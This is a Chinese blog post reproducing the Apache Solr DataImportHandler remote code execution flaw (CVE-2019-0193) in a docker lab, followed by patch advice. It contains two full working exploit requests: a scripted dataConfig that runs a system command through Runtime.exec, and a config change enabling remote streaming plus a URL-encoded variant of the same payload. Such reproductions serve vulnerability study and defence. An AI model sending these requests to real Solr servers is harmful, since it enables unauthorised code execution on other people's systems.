2. 程式人生 > >【漏洞復現】Apache Solr遠端程式碼執行(CVE-2019-0193)

【漏洞復現】Apache Solr遠端程式碼執行(CVE-2019-0193)

阿新 發佈:2019-12-03

0x01 概述

Solr簡介

Apache Solr 是一個開源的企業級搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。Apache Solr 中儲存的資源是以 Document 為物件進行儲存的。它對外提供類似於Web-service的API介面。使用者可以通過http請求,向搜尋引擎伺服器提交一定格式的XML檔案,生成索引;也可以通過Http Get操作提出查詢請求,並得到XML格式的返回結果。

漏洞概述

此漏洞存在於可選模組DataImportHandler中,DataImportHandler是用於從資料庫或其他源提取資料的常用模組,該模組中所有DIH配置都可以通過外部請求的dataConfig引數來設定,由於DIH配置可以包含指令碼,因此該引數存在安全隱患。攻擊者可利用dataConfig引數構造惡意請求,實現遠端程式碼執行。

影響範圍

Apache Solr <8.2.0

0x02 復現過程

環境搭建

啟動環境

cd /vulhub/solr/CVE-2019-0193
docker-compose up -d

 

建立Core

docker-compose exec solr bash bin/solr create_core -c test_0nth3way -d example/example-DIH/solr/db

 

搭建成功

訪問http://ip:8983

 

漏洞復現

手工驗證(EXP1:需要目標出網,支援低版本檢測)

 (1)判斷該索引庫是否使用了DataImportHandler模組

a.訪問 http://192.168.17.136:8983/solr/test_0nth3way/admin/mbeans?cat=QUERY&wt=json
b.如果使用了DataImportHandler模組 則HTTP響應內會有:
org.apache.solr.handler.dataimport.DataImportHandler

(2)構造HTTP請求,遠端執行程式碼

POST /solr/test_0nth3way/dataimport HTTP/1.1
Host: 192.168.17.136:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.17.136:8983/solr/
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 1231
Connection: close

command=full-import&verbose=false&clean=false&commit=false&debug=true&core=test_0nth3way&name=dataimport&dataConfig=
<dataConfig>


  <dataSource type="URLDataSource"/>
  <script><![CDATA[

          function poc(row){

 var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream()));

var result = [];

while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}

row.put("title",result.join("\n\r"));

return row;

}


  ]]></script>

        <document>
             <entity name="entity1"
                     url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
                     processor="XPathEntityProcessor"
                     forEach="/RDF/item"
                     transformer="script:poc">
                        <field column="title" xpath="/RDF/item/title" />
             </entity>
        </document>
</dataConfig>

 

手工驗證(EXP2:不需要目標出網,不支援低版本檢測)

(1)判斷該索引庫是否使用了DataImportHandler模組(同上)

(2)修改configoverlay.json檔案中的配置,以啟用遠端流的相關選項 (enableStreamBody、enableRemoteStreaming)  注:某些低版本會不成功,即響應500;成功響應200

POST /solr/test_0nth3way/config HTTP/1.1
Host: 192.168.17.136:8983
Accept: */*
Content-type:application/json
Content-Length: 159
Connection: close

{"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}, "set-property": {"requestDispatcher.requestParsers.enableStreamBody": true}}

(3)構造HTTP請求,遠端執行程式碼

POST /solr/test_0nth3way/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=test_0nth3way&name=dataimport&dataConfig=%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%69%64%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73%75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52%65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c%74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%6e%61%6d%65%3d%22%65%6e%74%69%74%79%31%22%0a%20%20%20%20%20%20%20%20%64%61%74%61%73%6f%75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45%6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%65%6d%22%0a%20%20%20%20%20%20%20%20%74%72%61%6e%73%66%6f%72%6d%65%72%3d%22%73%63%72%69%70%74%3a%70%6f%63%22%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%3c%66%69%65%6c%64%20%63%6f%6c%75%6d%6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%6c%65%22%20%2f%3e%0a%20%20%20%20%3c%2f%65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e HTTP/1.1
Host: 192.168.17.136:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.17.136:8983/solr/
Content-Length: 212
content-type: multipart/form-data; boundary=------------------------aceb88c2159f183f


--------------------------aceb88c2159f183f
Content-Disposition: form-data; name="stream.body"

<?xml version="1.0" encoding="UTF-8"?>
<RDF>
<item/>
</RDF>

--------------------------aceb88c2159f183f--

注:其中dataConfig的值,URLencode之前為以下字串

<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />

  <script><![CDATA[
          function poc(row){
 var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream()));

var result = [];

while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}

row.put("title",result.join("\n\r"));
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>

 

0x03 修復建議

(1)建議對Solr做訪問限制

(2)廠商已釋出補丁:https://issues.apache.org/jira/browse/SOLR-13669

 

 

 

  
 

            
  

           

              
              

            

            
相關推薦

			   
            
            
            
 

    


    
    
漏洞復現Apache Solr遠端程式碼執行CVE-2019-0193

     
 0x01 概述
Solr簡介
Apache Solr 是一個開源的企業級搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。Apache Solr 中儲存的資源是以 Document 為物件進行儲存的。它對外提供類似於Web-service的API介面 



  
 

    


    
    
漏洞復現ThinkPHP5 5.x 遠端命令執行(getshell)

     
 0x00復現環境 
ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠端命令執行漏洞利用(GetShell) 
0x01步驟 
 
  點選start to hack 進入環境頁面 run the project 然後訪問給出的target address1.執行系統命令顯示目錄下檔案  



  
 

    


    
    
漏洞復現Fastjson <=1.2.47遠端命令執行

     
  
0x01 漏洞概述
漏洞描述
Fastjson是一款開源JSON解析庫,它可以解析JSON格式的字串,支援將Java Bean序列化為JSON字串,也可以從JSON字串反序列化到JavaBean。
Fastjson存在遠端程式碼執行漏洞,當應用或系統使用 Fastjson 對由使用者可控的 JS 



  
 

    


    
    
漏洞復現WordPress插件Quizlord 2.0 XSS漏洞復現與分析

     
 secure   images   post   form   簡單的   wow   簡單   這樣的   出現   年後趁著需要做安全測試系統不多的這個空檔,學學python到處逛逛復現復現和分析一些簡單的漏洞
0x00 復現環境

phpstudy
wordpress 4.4版本

貌似WordPres 



  
 

    


    
    
函數isinstance內建函數小窗help

     
 是否   clas   dict   百度   .com   text   子類   als   float   #學到了第八天,還有很多沒有理解,不過,沒關系,相信任何復雜的問題都是由簡單的組成,只有將每一個細節理解到位,自然問題迎刃而解
今天遇到了isinstace函數,忘了,先看一下語法
查百度附上鏈接 



  
 

    


    
    
BZOJ3502/2288PA2012 Tanie linie/POJ Challenge生日禮物 堆+鏈表模擬費用流

     
 line   make   前驅   string   urn   return   namespace   禮物   iostream   【BZOJ3502】PA2012 Tanie linie
Description

 n個數字,求不相交的總和最大的最多k個連續子序列。 1<= k< 



  
 

    


    
    
TOJ 5255C++實驗:三角形面積海倫公式

     
 esc   man   opera   time   public   三角形面積   AC   pac   公式   描述

實現C++三角形類,其中包含3個點(CPoint類型),並完成求面積。主函數裏的代碼已經給出,請補充完整,提交時請勿包含已經給出的代碼。
int main()
{
	CPoint p 



  
 

    


    
    
HDU - 2200Eddy's AC難題簡單組合數學

     
  
 
 
 題幹: 
 Eddy是個ACMer,他不僅喜歡做ACM題,而且對於Ranklist中每個人的ac數量也有一定的研究,他在無聊時經常在紙上把Ranklist上每個人的ac題目的數量摘錄下來,然後從中選擇一部分人(或者全部)按照ac的數量分成兩組進行比較,他想使第一組中的最小ac數大於第二組中的最大 



  
 

    


    
    
51Nod - 1268和為K的組合 揹包 或 dfs

     
  
 
 
 題幹: 
 給出N個正整陣列成的陣列A,求能否從中選出若干個,使他們的和為K。如果可以,輸出:"Yes",否則輸出"No"。 
 Input 
 第1行:2個數N, K, N為陣列的長度, K為需要判斷的和(2 <= N <= 20,1 <= K <= 10^9)&nbs 



  
 

    


    
    
C語言實現對一個8bit資料unsigned char 型別的指定位例如第n位的置0或者置1操作,並保持其他位不變

     
  
 
 請編碼實現以下功能的函式 功能:實現對一個8bit資料(unsigned char 型別)的指定位(例如第n位)的置0或者置1操作,並保持其他位不變。 函式原型:void bit_set(unsigned char *p_data,unsigned char position,int flag) 
 



  
 

    


    
    
Grub & Grub2萬能優盤啟動盤 WinPE、LinuxPE-- 方法1 U盤三分割槽法不推薦,供參考

     
 
                        由於工作需要,經常使用Windows和Linux雙系統,系統使用過程中,個人涉及到的開發軟體過多(光基於Eclipse的IDE就有好幾個),經常過度安裝軟體,有時會越來越龐大,越來越不穩定,定期要重新安裝配置,但是又不想重頭安裝,基本軟體最好先配置好備份一下, 



  
 

    


    
    
機器學習馬修斯相關係數Matthews correlation coefficient

     
  
 
 馬修斯相關係數(Matthews correlation coefficient) 
 
 馬修斯相關係數是在使用機器學習作為二進位制(2類)的質量的度量的分類,通過布賴恩W.馬修斯在1975年由生物化學引入 
 它考慮到真和假陽性和假陰性,並且通常是被視為一種平衡的措施,即使這些類別的規模大小不同 



  
 

    


    
    
PAT甲級1052 Linked List Sorting (25)連結串列排序

     
 
                題目連結

A linked list consists of a series of structures, which are not necessarily adjacent in memory. We assume that each structure contai 



  
 

    


    
    
SketchUp教程太陽北極外掛的應用附下載方式

     
  
  
  
 作者 | 活力網Caigle 
  
 課程連結:http://uzing.net/course_show-1921-6323-1-5-1.html 
 在調整SketchUp陽光角度時,很多小夥伴覺得不夠靈活,而太陽北極工具可以解決你想要的任意角度的太陽光,但尊重真實的地理資訊是設計的根本 



  
 

    


    
    
自學筆記0基礎自學機器學習 第三天

     
   
“資料”是機器學習的基礎。 
  
 
  
  
初學機器學習時,我們通常處理的資料格式通常是以下的形式: 
  
  
 
  
   
    屬性(特徵)  
    幾室  
    幾廳  
    供暖(0地熱 1暖氣)  
   



  
 

    


    
    
資料結構中綴表示式轉換字尾表示式逆波蘭式

     
 
								
								            
							
							
							我的第一篇博文就是關於逆波蘭式的,現在回頭看感覺當時的程式碼太過混亂(不忍直視),在這裡對當時的程式碼進行一次重構。



#include <stdio.h>
#include <s 



  
 

    


    
    
智慧路由器openwrt實現內網穿透p2p、n2n

     
 
							
							
							



背景 
有時候在對線上裝置進行維護,由其是除錯的時候希望技術人員遠端進入路由後臺除錯路由資訊的時候,如果沒有內網穿透就會比較麻煩。

本篇部落格是在路由上實現內網穿透,以實現資料、檔案的點對點傳輸或訪問

閱讀時需要額外瞭解下p2p協議原理,以及n2n工 



  
 

    


    
    
c語言實現對一個8bit資料unsigned char 型別的指定位例如第n位置0或者置1操作,並保持其他位不變

     
 
                
// 實現對一個8bit資料(unsigned char 型別)的指定位(例如第n位)置0或者置1操作,並保持其他位不變

#include <stdio.h>

void bit_set(unsigned char *p_data, unsigned char 



  
 

    


    
    
日常記錄遊戲體驗報告怎麼寫自我成長篇

     
 
                作為一個遊戲策劃新人,遊戲分析可能抓不到點子上,試著總結記錄一下游戲體驗報告分析的成長(因為水平不同,視野可能也不一樣,也許之後幾年回頭看這些東西都是小兒科或者是錯誤的,所以只寫出當下的想法,以後再不斷打磨,本文主要為記錄用途)這是"表哥"看完我第一部分分析的反饋~  第一部 



  
 

    


    
    
直觀理解一文搞懂RNN迴圈神經網路基礎篇

     
 


推薦閱讀時間8min~15min

主要內容簡介:神經網路基礎、為什麼需要RNN、RNN的具體結構、以及RNN應用和一些結論

1神經網路基礎



神經網路可以當做是能夠擬合任意函式的黑盒子,只要訓練資料足夠,給定特定的x,就能得到希望的y,結構圖如下:



將神經網路模型訓練好之後,在輸入層給定一